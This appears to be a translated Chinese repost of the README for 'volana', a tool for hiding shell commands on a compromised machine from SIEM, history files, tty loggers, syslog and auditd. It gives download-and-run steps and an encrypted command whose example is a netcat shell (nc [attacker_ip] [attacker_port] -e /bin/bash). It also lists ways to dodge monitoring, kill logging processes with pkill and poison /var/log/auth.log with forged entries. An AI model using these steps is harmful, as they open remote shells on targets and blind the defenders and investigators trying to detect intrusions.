在滲透測試過程中,一個重要的面向是隱藏性。因此,你應該在通過後清除你的蹤跡。然而,許多基礎設施會記錄命令並即時將其發送到SIEM,
volana這使得事後清理部分本身毫無用處。透過提供自己的shell 執行時間(輸入你的命令,volana 會為你執行),提供一種隱藏在受感染機器上執行的命令的簡單方法。這樣,你就可以在通過過程中清除你的蹤跡
您需要取得一個互動式shell。 (找到一種方法來產生它,您是黑客,這是您的工作!否則)。然後在目標機器上下載並啟動它。就是這樣,現在您可以輸入要秘密執行的命令
## Download it from github release<br>## If you do not have internet access from compromised machine, find another way<br>curl -lO -L <a href= " https://github.com/ariary/volana/releases/latest/download/volana " rel="nofollow"><span>https</span><span>://</span><span>github</span><span>.</span><span>com</span><span >/</span><span>ariary</span><span>/</span><span>volana </span><span>/</span><span>releases</span><span>/</span><span>latest</span><span>/</span><span>download</ span><span>/</span><span>volana</span></a><br><br>## Execute it<br>./volana<br><br>## You are now under the radar<br>volana » echo "Hi SIEM team! Do you find me?" > /dev/null 2>&1 #you are allowed to be a bit cocky<br>volana » [command]<br>
volana 控制台的關鍵字:* ring:啟用環形模式,即每個命令都與大量其他命令一起啟動以掩蓋踪跡(來自監控系統調用的解決方案)* exit:退出volana 控制台
假設您有一個非互動式shell(webshell 或盲目rce),您可以使用<a href=" https://www.kitploit.com/search/label/Encrypt " target="_blank" title="encrypt"> encrypt</a>和decrypt子命令。以前,您需要使用volana嵌入式加密離子金鑰。
在攻擊者的機器上
## Build volana with encryption key<br>make build.volana-with-encryption<br><br>## Transfer it on TARGET (the unique detectable command)<br>## [.. .]<br><br>## Encrypt the command you want to stealthy execute<br>## (Here a nc bindshell to obtain a interactive shell)<br>volana encr "nc [attacker_ip] [attacker_port] -e /bin/bash"<br>>>> ENCRYPTED COMMAND<br>
複製加密的命令,並在目標機器上使用rce 執行它
./volana decr [encrypted_command]<br>## Now you have a bindshell, spawn it to make it interactive and use volana usually to be stealth (./volana). + Don't forget to remove volana binary before leaving (cause decryption key can easily be retrieved from it)<br><br>
echo [command] | base64為什麼不直接用隱藏指令?然後用echo [encoded_command] | base64 -d | bash
因為我們希望受到保護,免受觸發base64使用警報或在命令中尋找base64 文本的系統的影響。我們也想讓調查變得困難,而base64 並不是真正的阻礙。
請記住,這volana不是讓你完全隱形的奇蹟。它的目的是讓入侵偵測和調查變得更加困難。
偵測的意思是,如果某個指令被執行,我們是否能夠觸發警報。
volana只會捕獲啟動命令列。
但是,透過在執行之前添加空格,預設的bash 行為是不保存它- 基於歷史命令輸出的偵測系統
- 基於歷史文件的檢測系統
- .bash_history, “.zsh_history” 等等..
- 基於bash 調試陷阱的檢測系統
- 基於sudo 內建日誌系統的偵測系統
- 檢測系統追蹤系統範圍內所有進程的系統呼叫(例如opensnoop)
- 終端機(tty)記錄器(script、、、等等)screen -L sexonthebash ovh-ttyrec
- 易於檢測和避免:pkill -9 script
- 並非常見情況
- screen有點難以避免,但它沒有記錄輸入(秘密輸入:stty -echo=> 避免)
- 可以volana透過加密來避免命令檢測
- 對未知指令發出警報的偵測系統(volana one)
- 基於鍵盤記錄器的偵測系統
- 容易避免:複製/貼上指令
- 並非常見情況
- 基於syslog 檔案的偵測系統(例如/var/log/auth.log)
- 僅適用於sudo或su命令
- syslog 檔案可能會被修改,從而按照你的意願被毒害(例如/var/log/auth.log : logger -p auth.info "No hacker is poisoning your syslog solution, don't worry")
- 基於syscall 的偵測系統(例如auditd、LKML/eBPF)
- 難以分析,透過多次轉移系統呼叫可能會變得不可讀
- 自訂LD_PRELOAD注入來製作日誌
- 這不是常見的情況
如果您發現以下情況請告訴我: * 一種檢測方法volana* 一種監視不檢測volana命令的控制台的方法* 一種避免檢測系統的方法
在此報告
- 監視控制台的8 種方法
- 月球漫步:類似工具,可在通過後清除痕跡
下載Volana